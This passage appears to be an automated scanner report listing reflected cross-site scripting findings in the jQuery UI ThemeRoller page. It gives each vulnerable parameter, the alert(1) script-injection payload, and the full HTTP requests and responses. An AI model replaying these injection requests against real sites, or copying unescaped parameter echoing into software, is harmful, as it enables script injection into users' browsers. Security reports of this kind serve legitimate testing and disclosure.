verlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada64e26"><script>alert(1)</script>1a3124de35d&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=
...[SNIP]...

1.64. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e4f1"><script>alert(1)</script>409c40fb7a8 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa1e4f1"><script>alert(1)</script>409c40fb7a8&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
efa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa1e4f1"><script>alert(1)</script>409c40fb7a8&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

1.65. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6e9c"><script>alert(1)</script>97a66de1e5d was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaad6e9c"><script>alert(1)</script>97a66de1e5d&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaad6e9c"><script>alert(1)</script>97a66de1e5d&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.66. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload effe2"><script>alert(1)</script>ea171b4358b was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65effe2"><script>alert(1)</script>ea171b4358b&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65effe2"><script>alert(1)</script>ea171b4358b&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColo
...[SNIP]...

1.67. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37be1"><script>alert(1)</script>2443dcf35 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=7537be1"><script>alert(1)</script>2443dcf35&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120061

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=7537be1"><script>alert(1)</script>2443dcf35&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefaul
...[SNIP]...

1.68. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cf69"><script>alert(1)</script>f530c1d1079 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=753cf69"><script>alert(1)</script>f530c1d1079&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=753cf69"><script>alert(1)</script>f530c1d1079&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgC
...[SNIP]...

1.69. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b812"><script>alert(1)</script>7ded0019f81 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=955b812"><script>alert(1)</script>7ded0019f81&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=955b812"><script>alert(1)</script>7ded0019f81&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

1.70. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 465c6"><script>alert(1)</script>ee3c1ef3667 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75465c6"><script>alert(1)</script>ee3c1ef3667&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75465c6"><script>alert(1)</script>ee3c1ef3667&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22
...[SNIP]...

1.71. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b74b"><script>alert(1)</script>e7031a0cc1 was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=554b74b"><script>alert(1)</script>e7031a0cc1&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=554b74b"><script>alert(1)</script>e7031a0cc1&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a
...[SNIP]...

1.72. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb22a"><script>alert(1)</script>8dcb00c57c8 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75fb22a"><script>alert(1)</script>8dcb00c57c8&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75fb22a"><script>alert(1)</script>8dcb00c57c8&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgC
...[SNIP]...

